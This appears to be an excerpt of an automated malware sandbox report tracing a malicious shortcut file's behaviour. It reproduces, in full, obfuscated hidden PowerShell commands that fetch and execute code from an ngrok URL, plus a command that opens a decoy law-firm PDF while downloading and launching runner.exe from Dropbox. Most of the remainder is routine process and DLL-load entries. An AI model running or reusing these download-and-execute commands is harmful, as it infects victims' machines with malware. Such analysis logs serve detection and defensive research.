                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-b96944b1-fc36-a7801a-f3dda4a79090}
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9800
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhezbhxu.zcm.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: qxjDerXRGR.lnkReversingLabs: Detection: 21%
                    Source: 111392827.exeString found in binary or memory: -InstallNative
                    Source: 111392827.exeString found in binary or memory: -InstallNative
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9800 -s 144
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
